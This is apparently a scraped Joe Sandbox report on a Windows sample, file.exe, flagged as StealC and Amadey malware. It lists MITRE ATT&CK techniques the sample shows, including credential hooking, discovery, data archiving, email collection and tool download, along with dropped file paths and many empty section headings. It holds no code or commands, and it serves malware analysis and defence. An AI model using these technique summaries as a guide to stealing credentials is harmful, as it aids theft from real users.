Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGDAAKJJDAAKFHJKJKFCAEHDAF

C:\ProgramData\DAEGIIECGHCBFHJKEHDB

C:\ProgramData\DBFHDBGIEBFIIDGCBFBKEBFHJD

C:\ProgramData\FCBFBGDBKJKECAAKKFHD

C:\ProgramData\GIJECGDG

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre